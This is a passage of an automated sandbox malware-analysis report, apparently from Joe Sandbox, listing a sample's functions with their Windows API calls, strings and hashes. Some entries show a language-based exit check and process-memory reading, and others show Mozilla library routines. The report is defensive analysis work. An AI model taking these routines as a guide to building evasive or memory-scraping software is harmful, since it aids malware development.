Opcode Fuzzy Hash: 2d8229859c78af983c4dffcfd227aab8550e9f5a4710838c9667652fff2890d1
Instruction Fuzzy Hash: 6EC1C171E011688BEB34AB39CCA4B9DB772EF41314F1006F9D52AA73C1D7B99E848B51

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBC124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBC1268
GetCurrentThreadId.KERNEL32 ref: 6BBC12DA
InitializeConditionVariable.KERNEL32(?), ref: 6BBC134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BBC138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BBC1431

Part of subcall function 6BBB8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8BD5

free.MOZGLUE(?), ref: 6BBC145A
free.MOZGLUE(?), ref: 6BBC146C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 370d582c6cd3ec156d9989021a65fe724726e2cd4dcf02dfba5a7ccaa874ed74
Instruction ID: eab1b11d61465569e3217378242ba4fca753ff469d9e7e6d853fd1e79c09f0eb
Opcode Fuzzy Hash: 370d582c6cd3ec156d9989021a65fe724726e2cd4dcf02dfba5a7ccaa874ed74
Instruction Fuzzy Hash: 6161CB759047849BDB10CF24D880BAFB7E6FFC6308F04891DE99997212EB39E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6BB74B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74C63
free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74C89
free.MOZGLUE(?,?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CAC
free.MOZGLUE(?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74DD1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 3d4ebcb5f3c724ebc64e85f779f9466fd5593ab313549cd7a89a66a975c8c651
Instruction ID: 91dd74a4bd073bfdd7fe4307c35059805208a2abf4053b652520f13ff08d1676
Opcode Fuzzy Hash: 3d4ebcb5f3c724ebc64e85f779f9466fd5593ab313549cd7a89a66a975c8c651
Instruction Fuzzy Hash: A3518A71504A808FE334AB3CD96875A77A2AF02729F404A3DE1B7CBBD1D779E9448B41

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6BB81999), ref: 6BB7EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BB7EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BB7EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6BB81999), ref: 6BB7EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BB81999), ref: 6BB7EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BB7EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BB7EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BB7EB27

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: d6cb13fb9116afe183ef0c8f3ea3db1ba6e3d9cf00c5cbce9751bde1fcc309e8
Instruction ID: 0e95973e9a661dffcf59600903efcf52db6e314bc275c50e6ca3e3dda5ae7695
Opcode Fuzzy Hash: d6cb13fb9116afe183ef0c8f3ea3db1ba6e3d9cf00c5cbce9751bde1fcc309e8
Instruction Fuzzy Hash: 7B4193B1900255DFDB24DF68DC81AAE7BB9FF44254F150638E825E7394E734EA04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBCD36B
GetCurrentThreadId.KERNEL32 ref: 6BBCD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD3E1
free.MOZGLUE ref: 6BBCD408

Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA

GetCurrentThreadId.KERNEL32 ref: 6BBCD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BBCD472

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 6056702259db51f2af893ad1ff828bcdc3923eea36fcdc7261de014d01bc5130
Instruction ID: a4b2d0c8f6a00362e1e655250ef6fd9af4d69a120427ed5d978513d24be716a1
Opcode Fuzzy Hash: 6056702259db51f2af893ad1ff828bcdc3923eea36fcdc7261de014d01bc5130
Instruction Fuzzy Hash: B241DD799443458FCB14DF64D484AAFBBB9FF85314F00492DEA6287340EB7AE944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

@, xrefs: 00413C66
Z>A, xrefs: 00413C38, 00413C3B

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B48
free.MOZGLUE(?,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4BEE

Strings

pid:, xrefs: 6BBB4BE8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 4f88a7ccb273cd81b137fb46273ec858229312e0d5a0eda4fd7161e9d67cc373
Instruction ID: 0f0873ee8a834240981f163932b0d988c091a824d10e28d8731960f502ba6eb6
Opcode Fuzzy Hash: 4f88a7ccb273cd81b137fb46273ec858229312e0d5a0eda4fd7161e9d67cc373
Instruction Fuzzy Hash: 4D41C471B042999BCB14CFB8EC805AFBBE9FF85324B144638E969D7381DB349905C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDAAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BBFE220,?), ref: 6BBDBC2D
ReleaseSRWLockExclusive.KERNEL32(6BBFE220), ref: 6BBDBC42
RtlFreeHeap.NTDLL(?,00000000,6BBEE300), ref: 6BBDBC82
RtlFreeUnicodeString.NTDLL(6BBFE210), ref: 6BBDBC91
RtlFreeUnicodeString.NTDLL(6BBFE208), ref: 6BBDBCA3
RtlFreeHeap.NTDLL(?,00000000,6BBFE21C), ref: 6BBDBCD2
free.MOZGLUE(?), ref: 6BBDBCD8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 8f65b8e8a5ee1dc045541fc80e5a7109fc3b9b46ea938502cc71c738db9a3cb9
Instruction ID: a0446173f7fa606186583bcf74a582dee0cab97b17bb811f7125284c24456098
Opcode Fuzzy Hash: 8f65b8e8a5ee1dc045541fc80e5a7109fc3b9b46ea938502cc71c738db9a3cb9
Instruction Fuzzy Hash: 2B21F5725007448FE7308F16D880B6ABBA9FF41754F49846DE4195B610CBBDF842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB838A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BBFE220,?,?,?,?,6BB83899,?), ref: 6BB838B2
ReleaseSRWLockExclusive.KERNEL32(6BBFE220,?,?,?,6BB83899,?), ref: 6BB838C3
free.MOZGLUE(00000000,?,?,?,6BB83899,?), ref: 6BB838F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6BB83920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6BB83899,?), ref: 6BB8392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6BB83899,?), ref: 6BB83943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6BB8396E

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: b3c3aec88067f75c57a9b4d51d569b420604693519d2be9fa85e6f051dd7024c
Instruction ID: b8f890827100a96be8062ee24cdb752243d90cd8c38cf1dbad33ef7c6cc16a4a
Opcode Fuzzy Hash: b3c3aec88067f75c57a9b4d51d569b420604693519d2be9fa85e6f051dd7024c
Instruction Fuzzy Hash: B9210072600B90DFD720CF25D880B9ABBE9EF45324F128469F95A97710C739E842CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBCD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD1F5

Part of subcall function 6BBCAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BBCAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD211
GetCurrentThreadId.KERNEL32 ref: 6BBCD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD279
free.MOZGLUE(?), ref: 6BBCD2B2

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 934b10f19e2a9f9f63402c8366dc8e9df98db6866e3c7ffd81bc1ddb3ebfcf0d
Instruction ID: 8f88be5e03fffdff8ee24b0cd4a6339b96beb11ab2c0ce27d0abda275ce133f9
Opcode Fuzzy Hash: 934b10f19e2a9f9f63402c8366dc8e9df98db6866e3c7ffd81bc1ddb3ebfcf0d
Instruction Fuzzy Hash: 7C217C75604745EFCB04DF34D488AAEB7A5FF8A324F10452EE51A8B340DB35E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F

GetCurrentThreadId.KERNEL32 ref: 6BBB99C1
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99CE
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99F8
GetCurrentThreadId.KERNEL32 ref: 6BBB9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A0D

Part of subcall function 6BBB9A60: GetCurrentThreadId.KERNEL32 ref: 6BBB9A95
Part of subcall function 6BBB9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A9D
Part of subcall function 6BBB9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BBB9ACC
Part of subcall function 6BBB9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBB9BA7
Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BBB9BB8
Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BBB9BC9

Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BBB9A15

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 3f00c4d492bceecf361b6753a5f6b3c41b166e3bfc6f599033740783211cf4bb
Instruction ID: 3dd40d5d62b1da2cbda46d8f78bbeb3882434e44eb7bfaa34e0f3ffe9bd5377c
Opcode Fuzzy Hash: 3f00c4d492bceecf361b6753a5f6b3c41b166e3bfc6f599033740783211cf4bb
Instruction Fuzzy Hash: 6101D239C051A49BEB245F25B84967D3B6CEB53358F014016ED8553342CB3E8805C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB862E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6BB8631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BB8633A
__Init_thread_footer.LIBCMT ref: 6BB8634E
FreeLibrary.KERNEL32 ref: 6BB86376

Strings

CoUninitialize, xrefs: 6BB86334
combase.dll, xrefs: 6BB86316

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 9d8d20a839d2f0af3efb340d4373d156aef57b30a5685111832ac05624e13af9
Instruction ID: 679f573c3e0661dbc9b816cbf5ffcbe77abf6b28bc369592717532501c5363bd
Opcode Fuzzy Hash: 9d8d20a839d2f0af3efb340d4373d156aef57b30a5685111832ac05624e13af9
Instruction Fuzzy Hash: 6E011AB9916281CFEB149F2CF558B3877AEF70A315F044169D902C3680E73AE416CE65

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBC9BAE
free.MOZGLUE(?,?), ref: 6BBC9BC3
free.MOZGLUE(?,?), ref: 6BBC9BD9

Part of subcall function 6BBC93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBC94C8
Part of subcall function 6BBC93B0: free.MOZGLUE(6BBC9281,?), ref: 6BBC94DD

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
